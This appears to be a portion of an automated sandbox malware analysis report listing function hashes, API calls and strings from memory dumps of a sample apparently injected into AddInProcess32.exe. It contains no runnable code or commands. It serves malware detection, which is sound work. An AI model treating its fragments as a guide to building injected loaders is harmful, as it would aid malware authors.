Function 07F55680 Relevance: .7, Instructions: 734COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212419284.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f50000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe1c7dd782df7f2b1206dbb153901c20207e2fb11b2f8ba0240b07d2e6a9191f
Instruction ID: 54167115736e12975f33ea8a62ff7438f84b11af26b40e032bb6d2c4aae129c2
Opcode Fuzzy Hash: fe1c7dd782df7f2b1206dbb153901c20207e2fb11b2f8ba0240b07d2e6a9191f
Instruction Fuzzy Hash: EF32F071E043458FCB05EFB9D85856DBFF2BF89200F1585AED099DB391EA389806CB52

Function 07F5562D Relevance: .6, Instructions: 556COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212419284.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f50000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edf154e834b9b4f4d9ff9bf664fea479725d27711bba5a7c3a9be7ddd1ab8fd8
Instruction ID: fd496c545d5e8c409c0be5a673ca45adae084823b7c6fe228b445649af06f966
Opcode Fuzzy Hash: edf154e834b9b4f4d9ff9bf664fea479725d27711bba5a7c3a9be7ddd1ab8fd8
Instruction Fuzzy Hash: F512A071F102098FCB08EFB9D85956EBBF2BFC8200B55856DD059E7354EE389816CB52

Function 04D618D0 Relevance: .4, Instructions: 426COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2190359854.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14616a0df629fd73135cce63996cd59849df5ce4bffd342c61f70913c461a312
Instruction ID: dd8820501848535fb508bc573c8cf388a5cf5b6c90130272583f0535d6b7bfc3
Opcode Fuzzy Hash: 14616a0df629fd73135cce63996cd59849df5ce4bffd342c61f70913c461a312
Instruction Fuzzy Hash: E1E1BC31B006048FEB19DB79C564B6EB7F6AF89700F1484ADD14A9B390DF36E906CB61

Function 064E15C8 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2207492676.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64e0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d38186f8484543ddbb0e4de4e68957d1aa9f78de056783d402fbef05a3768097
Instruction ID: 0409bf9f8400bd526ffa2991fb086434661a357815c034d641835a86a3751bc1
Opcode Fuzzy Hash: d38186f8484543ddbb0e4de4e68957d1aa9f78de056783d402fbef05a3768097
Instruction Fuzzy Hash: D3A1A270B402545FDB58EBBD846476F6AEBAFC8300F64896DD049EB398CE389C438791

Function 07EE4000 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19262cf0734a8e8e91c77023c330c7334342ed8c3527bc90fe673ecf804e612c
Instruction ID: 761a64f7394260a055540f96e99c9b4a4891588f723a9e12f1c9384e7de7a3fc
Opcode Fuzzy Hash: 19262cf0734a8e8e91c77023c330c7334342ed8c3527bc90fe673ecf804e612c
Instruction Fuzzy Hash: B9D1F735C1075A9ECB04EF64D990A9DB7B2FF95300F5087AAD1097B220EB746AD5CB81

Function 07EE4010 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b1707a705e1d099a60e1fdf669edf4e1cdf337382c4a98b0faa790712efacba
Instruction ID: 224263b79ece82982dd0762edd889611fa33bead4c7d8d7b063729c1522dffa5
Opcode Fuzzy Hash: 4b1707a705e1d099a60e1fdf669edf4e1cdf337382c4a98b0faa790712efacba
Instruction Fuzzy Hash: B5D1F635C1075A9ECB14EF64D990A9DB7B2FF95300F5087AAD1093B220EBB46ED5CB81

Function 0853C560 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70af96ccd8badaebceab254f3cf9ffa951cbb2eb1b09e747a28a4a6f24cd38c0
Instruction ID: c9e341bba96c279479af79432fdf277ae33e12177a1c615aa9eecace8ae33165
Opcode Fuzzy Hash: 70af96ccd8badaebceab254f3cf9ffa951cbb2eb1b09e747a28a4a6f24cd38c0
Instruction Fuzzy Hash: 33A10C71E011298FCB14CFA9D580AAEFBB2FB89301F24D1A9D419A7255D7349D41CF61

Function 0853AC00 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 980d8483b5f39d356df19a031ea57f0c380ea75c3486e2bc76dccfcaac2c182c
Instruction ID: 73e52868a62bb77e7a0a38ab60f8ccfd6d8160fafd1631101898fdaf3a03ac81
Opcode Fuzzy Hash: 980d8483b5f39d356df19a031ea57f0c380ea75c3486e2bc76dccfcaac2c182c
Instruction Fuzzy Hash: A0813B70E016298FDB14CFA9D980AAEFBF2FF89301F24D1A9E418A7255D7349A41CF51

Function 08531DB8 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 017e841827ff9cc9ccae84d24480eccfb025126c2e06566d1014fd41594d1d73
Instruction ID: 1c871d8ce2d7ecbbcc041f86c532c06690400bc669bf11d64cb3ac66a7c3e5ed
Opcode Fuzzy Hash: 017e841827ff9cc9ccae84d24480eccfb025126c2e06566d1014fd41594d1d73
Instruction Fuzzy Hash: E1710334E11519DFCB48CFA9D58499EFBF2FF88211F14956AE819AB324D730AA41CF50

Function 085340A8 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e1ef30b3e822620283ca7ebe76db2c9cbe00096f63c6cd04f8bed7da4a23f4b
Instruction ID: 20170de4a478c82fbfccaa3c87cca0577b3514022897ea3e038b3820dcd616a3
Opcode Fuzzy Hash: 3e1ef30b3e822620283ca7ebe76db2c9cbe00096f63c6cd04f8bed7da4a23f4b
Instruction Fuzzy Hash: 8C711171D05654ABDB59CF7ACC8468BBFFBAFC5210F14C0EAD448AA216DB304986CF51

Function 08531DC8 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29851fe91a332283ca1d019bde31dc02359422fe3e02876c8d53acc977841f8b
Instruction ID: edd3b60347c107195a75974594b371f80a5c96896d4177937f29b9a9ad98ebbb
Opcode Fuzzy Hash: 29851fe91a332283ca1d019bde31dc02359422fe3e02876c8d53acc977841f8b
Instruction Fuzzy Hash: 1B71E274E15119DFCB48CFA9D58499EFBF2FF88211F14956AE418AB324D730AA41CF50

Function 085319C0 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c409fdf868a62a4c2fd64cba69e1a073984e56f4029c257cf86ce335f706c367
Instruction ID: 3643456dc5c4be12cc12ad7bece4530fd9103e5337a5aac7c94cb6787f16e58a
Opcode Fuzzy Hash: c409fdf868a62a4c2fd64cba69e1a073984e56f4029c257cf86ce335f706c367
Instruction Fuzzy Hash: 82516EB0E45619DFCB04CFA5C5405AEFBB2FF89342F14DA9AD415A7204D7309B418FA5

Function 08537550 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9dbc1432fdf0b5f9aaa0c5b55a42e1bc0866dbda25cc04d6595f0adbd0e356e
Instruction ID: f23b8cea3e88203814f06f7ff1c38c0fabe504fb7078fdb2218abca38a2fe8ad
Opcode Fuzzy Hash: d9dbc1432fdf0b5f9aaa0c5b55a42e1bc0866dbda25cc04d6595f0adbd0e356e
Instruction Fuzzy Hash: 7841FBB0D09294AFCB0ACF79DC4559EBFF6BF8A211F14C0FAD40497252D6304605CB62

Function 08537CF8 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c63f56925fee038a16e48ba0bde6695873c6d5b4998fb0dfbb4c52bb5c1d86f
Instruction ID: 7667c9a485789f1519a457c6589cc341df8cf062be84dab8ded838ff475266f7
Opcode Fuzzy Hash: 0c63f56925fee038a16e48ba0bde6695873c6d5b4998fb0dfbb4c52bb5c1d86f
Instruction Fuzzy Hash: 4B514FB0E011298BCB14CFAAD9805AEFBF2FF89301F24D5AAD418A7215DB345E45CF65

Function 08534158 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ee4dadcd7a0e446f1669432b6fd30a1e620730b731681abb20b6972495104fe
Instruction ID: cd78e884e21ec40cac2e33bea221e30deead9488a026985f9a5783446f17452f
Opcode Fuzzy Hash: 0ee4dadcd7a0e446f1669432b6fd30a1e620730b731681abb20b6972495104fe
Instruction Fuzzy Hash: EC513B71E016188BDB68CF6B894479EFBF7BFC8311F14C1BA950CA6254EB341A868F15

Function 085333F0 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45a93489e91bcebf26282c626a67c64f589556eceb791d90e7ca6a7d8b4bd297
Instruction ID: 3f442b3c98d2fe0a6a3c4bfc2adcf679c3851273b9eb1a71903916dd4ab7acda
Opcode Fuzzy Hash: 45a93489e91bcebf26282c626a67c64f589556eceb791d90e7ca6a7d8b4bd297
Instruction Fuzzy Hash: D241F4B4E0121A9FCB05CFAAD5405EEFBF2BF89211F24C56AC418B7354E7349A418BA4

Function 08533400 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 254db29956fc37397e5194244aa86ddc9a3184d76feaa83c43e0e8f2ecc53c1a
Instruction ID: 70601c467ee967b73cb802829d03df64e267ebb4a45c8be5f58885e6b5a9a561
Opcode Fuzzy Hash: 254db29956fc37397e5194244aa86ddc9a3184d76feaa83c43e0e8f2ecc53c1a
Instruction Fuzzy Hash: A241D4B4E0121ADFDB44CFAAD5406EEFBB2BF88311F24C56AC419B7314E7349A418B94

Function 0853359A Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8fb39d5b79cb4f88859d5f9e15ef564b7af41903687ae2a7d51f42be50fe5f0
Instruction ID: 231c72ae95079833f7d430c3e0fc0cb86c5e423ff33f2181ce779fdb9997a650
Opcode Fuzzy Hash: e8fb39d5b79cb4f88859d5f9e15ef564b7af41903687ae2a7d51f42be50fe5f0
Instruction Fuzzy Hash: 6311DD71E016189BEB59CF6BDC446DEFBF3AFC9200F08C0BAD418A6264EB3416458F55

Analysis Process: AddInProcess32.exePID: 1188, Parent PID: 6496COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	4.9%
Signature Coverage:	7.7%
Total number of Nodes:	142
Total number of Limit Nodes:	9

Executed Functions

Function 00417263 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004172D5

Memory Dump Source

Source File: 00000003.00000002.2460765366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: e130672a757225177bb77e29680786d3c95509369f49faa1056a6bd737f53083
Instruction ID: 8cfae454741fbcaa43489770de0248c5924349e1d727c70a028447295a213a76
Opcode Fuzzy Hash: e130672a757225177bb77e29680786d3c95509369f49faa1056a6bd737f53083
Instruction Fuzzy Hash: 8A0112B5E4010DB7DF10DAE5DC42FDEB3789B54308F4081A6F90897241F635EB598755

Function 0042C083 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C0B7

Memory Dump Source

Source File: 00000003.00000002.2460765366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 8b971bdfc414e80551b9710e2327f946f7bc6d18b610e0ad420c3edba55e2de4
Instruction ID: 6ba3c4d148de17d041ac54a39cce4bf54835f889bf4560e0b815e16f20cbcf2e
Opcode Fuzzy Hash: 8b971bdfc414e80551b9710e2327f946f7bc6d18b610e0ad420c3edba55e2de4
Instruction Fuzzy Hash: E6E086367002157BC220EA5ADC01FEB775DDFC6714F00446AFA48A7242C6B5B90087F5

Function 01992B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01992B6A

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 39f0a88d50b6c44eb76da7a5605c24e5e6c04074f4173a0e55aaf13d1621c663
Instruction ID: daa30d32cab72c32ebe2c19c88073e52170ef349cf28b439aa0656403283b4bb
Opcode Fuzzy Hash: 39f0a88d50b6c44eb76da7a5605c24e5e6c04074f4173a0e55aaf13d1621c663
Instruction Fuzzy Hash: 9E9002A170250003410571984428616804E97E0202B95C021E1054590DC52589956265

Function 01992DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01992DFA

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 09b83223b074cb1af06e906c548df34c4a28dcdb71beb37a94d26032c7fb42c5
Instruction ID: 18ca2fdc0bf1e96872e9230d230d0045789c69c9a0e1ace1c0ced392466951fc
Opcode Fuzzy Hash: 09b83223b074cb1af06e906c548df34c4a28dcdb71beb37a94d26032c7fb42c5
Instruction Fuzzy Hash: DD90027170150413D11171984518707404D97D0242FD5C412A0464558DD6568A56A261

Function 01992C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01992C7A

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 65a9c19877330b4dc6ab0e008c8815641ccee102c18acdd0f4af28e445f279be
Instruction ID: b089f23618b67e638e7fd4dddb19c52dfb6f35090cc958e16a8139852c57ca8a
Opcode Fuzzy Hash: 65a9c19877330b4dc6ab0e008c8815641ccee102c18acdd0f4af28e445f279be
Instruction Fuzzy Hash: 5490027170158802D1107198841874A404997D0302F99C411A4464658DC69589957261

Function 019935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019935CA

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0d3de9794eb52d3335c3cabf1c92996fd88c40af89f5a4c1056bb12960fa8a0d
Instruction ID: 7033bf1eb5001d1e620d0cc911df86463199244f585eb389b7fe089823abdc97
Opcode Fuzzy Hash: 0d3de9794eb52d3335c3cabf1c92996fd88c40af89f5a4c1056bb12960fa8a0d
Instruction Fuzzy Hash: 65900271B0560402D10071984528706504997D0202FA5C411A0464568DC7958A5566E2

Function 004139FD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

40182GJpK, xrefs: 00413B64, 00413B67
40182GJpK, xrefs: 00413B50, 00413B5C, 00413B6D

Memory Dump Source

Source File: 00000003.00000002.2460765366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID: 40182GJpK$40182GJpK
API String ID: 0-1732074181
Opcode ID: 6a3123850d4712c6f3c47aa48a2f6e6cab181046cb56ee48376dedbec5bb76ee
Instruction ID: 54ba290042158406bef2002de3d77798fd8d94b97a457131526223502d5919c0
Opcode Fuzzy Hash: 6a3123850d4712c6f3c47aa48a2f6e6cab181046cb56ee48376dedbec5bb76ee
Instruction Fuzzy Hash: 02216A35904204ABDB109F649C01BDEB728DF80350F1041AAFE08AF381E7B9AE1747D9

Function 00413AD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(40182GJpK,00000111,00000000,00000000), ref: 00413B5D

Strings

40182GJpK, xrefs: 00413B64, 00413B67
40182GJpK, xrefs: 00413B50, 00413B5C, 00413B6D

Memory Dump Source

Source File: 00000003.00000002.2460765366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 40182GJpK$40182GJpK
API String ID: 1836367815-1732074181
Opcode ID: 29bc7bb1d86d0e64420bc72cecf128ecf8bf79e5ff5fc45eedd8422de3fcb141
Instruction ID: 46e6152b918b2ab8d40d5a12d4075021ca87d40bbe813e00214b3802e861a8ea
Opcode Fuzzy Hash: 29bc7bb1d86d0e64420bc72cecf128ecf8bf79e5ff5fc45eedd8422de3fcb141
Instruction Fuzzy Hash: 5411E971D4025876DB20A6E19C02FDF7B7C9F81B54F148056FE007B2C1E6BC6A0687A9

Function 00413AE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(40182GJpK,00000111,00000000,00000000), ref: 00413B5D

Strings

40182GJpK, xrefs: 00413B64, 00413B67
40182GJpK, xrefs: 00413B50, 00413B5C, 00413B6D

Memory Dump Source

Source File: 00000003.00000002.2460765366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 40182GJpK$40182GJpK
API String ID: 1836367815-1732074181
Opcode ID: b6524c8293c310d04f155a748fd4dc47cd24b5e244f03135f6d98f8fb1ddaf06
Instruction ID: ec0d738163ec799428640293b9e6adc05bc5e59adc899c2a6c32f1545cba2132
Opcode Fuzzy Hash: b6524c8293c310d04f155a748fd4dc47cd24b5e244f03135f6d98f8fb1ddaf06
Instruction Fuzzy Hash: 6F01DB71D4425876DB10A6E19C02FDF7B7C9F81B54F108056FA047B2C1D7BC6A0687E9

Function 0042C3E3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,8B5653EC,00000007,00000000,00000004,00000000,00416AE9,000000F4), ref: 0042C41F

Memory Dump Source

Source File: 00000003.00000002.2460765366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6f7a437a4fe6ffefe3c079f6747f95bbe079d97dae1cb90a78422be9fd25f5c8
Instruction ID: bc6c2c8dcba1563d783e0665e41d6b6c931940785fcbc4d2299928260be76aa6
Opcode Fuzzy Hash: 6f7a437a4fe6ffefe3c079f6747f95bbe079d97dae1cb90a78422be9fd25f5c8
Instruction Fuzzy Hash: 81E092726042047BD610EE99EC41F9B33ACEFC5710F00441AF908A7241D678BD10CBB8

Function 0042C393 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041DFDB,?,?,00000000,?,0041DFDB,?,?,?), ref: 0042C3CF

Memory Dump Source

Source File: 00000003.00000002.2460765366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1578c16345c0a5ff929c6da6ef68ac4422df4ef3682306c3ad075ccdf9c020e7
Instruction ID: 2c3ee285035356050b8b14987371c96826316522038154b926abfd9c6190b081
Opcode Fuzzy Hash: 1578c16345c0a5ff929c6da6ef68ac4422df4ef3682306c3ad075ccdf9c020e7
Instruction Fuzzy Hash: 46E09272600605BBC710EE99DC45F9B33ADDFC5710F00442AFE08A7281D674B910CBB8

Function 0042C433 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,0AF9562E,?,?,0AF9562E), ref: 0042C464

Memory Dump Source

Source File: 00000003.00000002.2460765366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: a55bc4e8ae7869542b269f975df77d106981d4c1871348a831bece4539a58964
Instruction ID: 127036a066d1b63416a861a67806898ea050c0a6ce2094bbed669ad6a20d967a
Opcode Fuzzy Hash: a55bc4e8ae7869542b269f975df77d106981d4c1871348a831bece4539a58964
Instruction Fuzzy Hash: 2AE086316002147BC220EF5ADC01F97775DDFC5714F40446AFA08A7281C775B90587F8

Function 01992C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01992C24

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f1b1dbf69886bb0a4e3875b6d154bc86f8c3c1f5e01a82d1a03a1e498a1f7177
Instruction ID: f17e8227c5267afb2f1580da677366825ee390bcf95788be75c043e2c35ef6b8
Opcode Fuzzy Hash: f1b1dbf69886bb0a4e3875b6d154bc86f8c3c1f5e01a82d1a03a1e498a1f7177
Instruction Fuzzy Hash: E0B09B71D015C5D5DF11E7A4460C717794477D0702F55C061D2070651F4738D1D5E2B5

Non-executed Functions

Function 019D2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

MinimumStackCommitInBytes, xrefs: 019D2BB0
DisableExceptionChainValidation, xrefs: 019D275F
ExecuteOptions, xrefs: 019D25A0
UseImpersonatedDeviceMap, xrefs: 019D251C
CFGOptions, xrefs: 019D2967
@, xrefs: 019D2942
ShutdownFlags, xrefs: 019D24A1
TracingFlags, xrefs: 019D2549
LdrpInitializeExecutionOptions, xrefs: 019D317D
MaxLoaderThreads, xrefs: 019D24EC
@, xrefs: 019D2B74
DisableHeapLookaside, xrefs: 019D246D
MaxDeadActivationContexts, xrefs: 019D2D82
RaiseExceptionOnPossibleDeadlock, xrefs: 019D2579
Initializing the application verifier package failed with status 0x%08lx, xrefs: 019D3176
GlobalFlag2, xrefs: 019D2FC0
FrontEndHeapDebugOptions, xrefs: 019D2489
UnloadEventTraceDepth, xrefs: 019D24C0
minkernel\ntdll\ldrinit.c, xrefs: 019D3187
GlobalFlag, xrefs: 019D2F3F, 019D3059

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: e5daf48fb83f56187231b9ba7321497dee928d0115f10d79a6a227ccafa18a72
Instruction ID: 529d6bd2368081f1b7c4dc013a1bd2a5f064883e30270dad054ff459a9a9eba4
